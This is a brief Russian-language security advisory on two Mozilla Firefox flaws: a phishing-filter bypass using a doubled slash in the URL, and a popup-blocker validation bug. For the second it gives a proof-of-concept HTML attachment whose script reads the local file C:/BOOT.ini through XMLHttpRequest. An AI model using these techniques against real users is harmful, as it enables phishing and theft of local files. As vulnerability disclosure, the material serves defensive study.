Программа: Mozilla Firefox

Найденные уязвимости позволяют удаленному злоумышленнику осуществить фишинг атаку и получить доступ к конфиденциальной информации на целевой системе.

1) Уязвимость возникает из-за ошибки в механизме защиты от фишинга. Атакующий может добавить символ "/" в конец URL, тем самым, обманув Firefox, выдав злонамеренный сайт за безопасный.

Пример:

Когда URL занесен в список фишинговых сайтов (Phishing List):

http://kaneda.bohater.net/phish.html — будет выведено предупреждение
http://kaneda.bohater.net//phish.html – предупреждения не будет

2) Уязвимость возникает из-за ошибки в проверке входных данных в Firefox Popup Blocker. Атакующий может использовать XMLHttpRequest запрос и использовать URL вида file:///, что позволит ему получить содержимое произвольных файлов на целевой системе.

Пример:

Content-type: text/html
Content-disposition: attachment; filename="foo.html"

<html><body><script>
x = new XMLHttpRequest;
x.open("GET", "file:///c:/BOOT.ini", false);
x.send(null);
alert("The script attempted to read your C:/BOOT.ini:\n\n" + x.responseText);
</script>



Оставить мнение